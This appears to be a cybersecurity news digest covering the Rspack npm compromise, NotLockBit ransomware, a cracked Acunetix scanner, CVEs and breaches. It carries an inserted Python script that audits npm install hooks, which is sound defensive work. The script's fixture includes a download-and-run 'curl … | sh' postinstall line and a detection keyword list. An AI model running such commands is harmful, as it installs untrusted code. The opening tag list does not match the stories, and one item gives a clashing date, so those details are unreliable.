What’s going on in the cyber world today?
APT29, PyRDP, RDP Servers, Espionage, HubPhish, HubSpot, Free Forms, Phishing, UAC-0125, Cloudflare Workers, Malware, Army+, Ukraine, Remote Code Execution, Fortinet, Apache, Struts, Critical Vulnerability, Crimson Wine Group, Breach, Personal Information, Hapn, GPS Data, Leak, Pirelli, Positive Behavior Supports Corporation, Breach, Bank Rakyat Indonesia, Ransomware Attack, TP-Link, Routers, Ban, US, Cybersecurity Concerns, UK, White Hat Legal Shield, Raccoon Infostealer, Sentenced, US, Department of Justice, Dutch Data Protection Authority, Netflix, GDPR Violations, BlueQubit, Quantum Software Solutions, Real-World Apps
Cyber Alerts
Rspack developers disclosed a supply chain attack on their npm packages, @rspack/core and @rspack/cli, which were compromised with cryptocurrency mining malware. The malicious versions exfiltrated sensitive data and executed the XMRig miner on Linux hosts using a postinstall script. With over 445,000 weekly downloads, the attack highlights the risks in open-source ecosystems.
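The Rspack compromise relied on an npm lifecycle hook (a postinstall script) to run the miner, which is something a defender can inventory before installing. The following Python script is an added example, not code from the page, from Rspack or from the attackers: it walks a dependency tree, lists every package that declares a preinstall, install, postinstall or prepare script, and flags commands that download-and-execute or hide their payload. The package names, versions and commands in the sample tree are constructed for the demonstration; the keyword list is a simple heuristic, not a complete detector.

```python
"""Audit npm lifecycle scripts in a dependency tree (added example, constructed data)."""
import json
import tempfile
from pathlib import Path

# Hooks npm runs automatically during install; any of these executes arbitrary code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Rough heuristic for commands that fetch or decode a payload at install time.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "| sh", "| bash", "base64", "xmrig", "eval(")


def find_install_scripts(node_modules):
    """Return sorted (name, version, hook, command) tuples for every package
    under node_modules that declares a lifecycle hook."""
    findings = []
    for pkg_json in Path(node_modules).rglob("package.json"):
        try:
            manifest = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or malformed manifest: skip, do not crash the audit
        scripts = manifest.get("scripts") or {}
        if not isinstance(scripts, dict):
            continue
        for hook in LIFECYCLE_HOOKS:
            command = scripts.get(hook)
            if command:
                findings.append((
                    manifest.get("name", str(pkg_json)),
                    manifest.get("version", "?"),
                    hook,
                    command,
                ))
    return sorted(findings)


def is_suspicious(command):
    """True when the command contains a download/decode/execute token."""
    lowered = command.lower()
    return any(token in lowered for token in SUSPICIOUS_TOKENS)


def build_sample_tree(base):
    """Write a small constructed node_modules tree: one package with no hooks,
    one legitimate native build hook, and one download-and-run postinstall."""
    manifests = {
        "plain-lib": {"name": "plain-lib", "version": "1.0.0",
                      "scripts": {"test": "node test.js"}},
        "native-addon": {"name": "native-addon", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        "evil-pkg": {"name": "evil-pkg", "version": "0.0.1",
                     "scripts": {"postinstall": "curl -s http://example.invalid/x | sh"}},
    }
    node_modules = Path(base) / "node_modules"
    for name, manifest in manifests.items():
        pkg_dir = node_modules / name
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return node_modules


def run_demo():
    """Audit the constructed tree; return (all hook findings, flagged findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        node_modules = build_sample_tree(tmp)
        findings = find_install_scripts(node_modules)
        flagged = [f for f in findings if is_suspicious(f[3])]
    return findings, flagged


if __name__ == "__main__":
    all_hooks, flagged = run_demo()
    for name, version, hook, command in all_hooks:
        marker = "REVIEW" if is_suspicious(command) else "ok    "
        print(f"{marker} {name}@{version} {hook}: {command}")
```

Run the audit against a freshly installed tree, or install with `npm ci --ignore-scripts` first so that no hook runs before review. A legitimate native module (the `node-gyp rebuild` case above) will appear in the list, so the output is a review queue rather than a verdict; the value is in seeing a hook appear in a package that never had one before.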
A new ransomware strain, NotLockBit, has emerged as a cross-platform threat targeting both Windows and macOS systems. Written in Go, it employs advanced techniques such as AES and RSA encryption to lock files, exfiltration of sensitive data to attacker-controlled storage for double extortion, and a self-deletion mechanism to erase traces of the attack. NotLockBit also uses obfuscation to evade detection and performs detailed reconnaissance, especially on macOS, to gather system information.
Threat actors have been selling a cracked version of Acunetix, a popular commercial web application vulnerability scanner, under the name “Araneida Scanner” on cybercrime forums and Telegram channels. This unauthorized tool is used by cybercriminals for offensive reconnaissance, scraping user data, and identifying vulnerabilities for exploitation on target websites. Researchers found that the cracked version, which bypasses the software’s licensing requirements, has been widely used, with operators claiming to have compromised over 30,000 websites in just six months.
Microsoft has swiftly patched a critical privilege escalation vulnerability in Windows 11 version 23H2, identified as CVE-2024-30085, which resides in the Cloud Files Mini Filter Driver (cldflt.sys). This flaw stems from improper validation of user-supplied data when parsing reparse points, allowing attackers to overwrite memory and execute code with SYSTEM-level privileges.
Sophos has released critical hotfixes to address three security vulnerabilities in its firewall products that could allow remote code execution and privileged system access. Two of these vulnerabilities, CVE-2024-12727 and CVE-2024-12728, are rated as critical with CVSS scores of 9.8. The flaws involve a pre-authentication SQL injection in the email protection feature and weak credentials in the High Availability (HA) setup, respectively. The third, CVE-2024-12729, is a post-authentication code injection vulnerability in the User Portal.
Cyber Incidents
Ukraine recently experienced its largest cyberattack on critical state infrastructure, targeting the nation’s state registers, which store vital data about citizens, businesses, and organizations. The attack, suspected to have originated from Russia, disrupted key systems that facilitate public services and economic activity, leading to a two-week period of downtime. The Justice Ministry, responsible for maintaining these systems, took immediate action by temporarily taking critical services offline to mitigate further damage.
On December 19, 2024, VisionPoint Eye Center reported a data breach to the Attorney General of Texas, revealing that an unauthorized party had gained access to its network in October 2024. The breach exposed sensitive patient information, including first and last names, medical record numbers, health insurance details, and medical information. VisionPoint took immediate action to secure its network and launched an investigation with the help of cybersecurity experts.
Arena Technical Resources, LLC (ATR) reported a data breach to the Massachusetts Attorney General on December 17, 2024, after discovering that an unauthorized party had accessed sensitive consumer information. While the cause of the breach remains unclear, ATR is investigating whether the breach occurred within the company’s systems or through a third-party vendor.
The Nigerian National Bureau of Statistics (NBS) recently confirmed that its newly revamped website was hacked, disrupting access to vital national data. In a statement shared via its official X (formerly Twitter) account, the agency assured the public that efforts were underway to restore the platform and secure its data. This breach, which occurred just two weeks after the relaunch of the NBS website, has raised concerns over the security of official statistics and the growing vulnerability of public institutions to cyberattacks.
Richmond University Medical Center recently disclosed a data security incident following a cyberattack on May 6, 2023, which led to unauthorized access to its network. The center immediately initiated an investigation, consulting outside cybersecurity experts to assess the potential exposure of personal and protected health information. While the investigation remains ongoing, there have been no reports of identity fraud directly linked to the breach.
Cyber News
The U.S. Department of Health and Human Services (HHS) has issued a warning to the healthcare sector about the increasing vulnerability of Operational Technology (OT) and the Internet of Medical Things (IoMT) to cyberattacks. These devices, crucial for patient care, facility management, and data collection, are often outdated and lack adequate cybersecurity measures, making them prime targets for malicious actors.
The UK Information Commissioner’s Office (ICO) has criticized Google’s upcoming advertising policy updates, set to take effect in February 2024, which the agency argues could pave the way for unrestricted device fingerprinting in online advertising. The ICO contends that this policy change, which allows advertisers to track users using unique device identifiers such as IP addresses and browser data, may undermine user privacy.
North Korean hackers have escalated their cryptocurrency thefts, stealing an estimated $1.3 billion in 2024, according to a recent report from blockchain analytics firm Chainalysis. This marks a dramatic increase from the $660 million stolen in 2023, highlighting the growing sophistication of cyber operations linked to the Democratic People’s Republic of Korea (DPRK). The report notes a significant rise in high-value attacks, with an increasing number of heists exceeding $50 million.
Daniel Christian Hulea, a Romanian hacker involved in the NetWalker ransomware operation, has been sentenced to 20 years in prison after pleading guilty to computer fraud and wire fraud conspiracy charges. Hulea, who was arrested in Romania in July 2023 and extradited to the United States, participated in deploying ransomware attacks targeting hospitals, law enforcement agencies, and businesses worldwide. The group exploited the COVID-19 crisis to extort victims, earning over $21 million in ransom payments.
SandboxAQ, an Alphabet spinoff specializing in quantum and AI technologies, has successfully raised $300 million in its latest funding round, bringing its total valuation to $5.3 billion. The round saw participation from prominent investors, including Fred Alger Management, T. Rowe Price Associates, and tech luminaries such as Eric Schmidt and Marc Benioff. The new capital will accelerate the development of SandboxAQ’s advanced solutions, including Large Quantitative Models (LQMs) and AI applications across industries like cybersecurity, healthcare, and materials science.
Copyright © 2024 CyberMaterial. All Rights Reserved.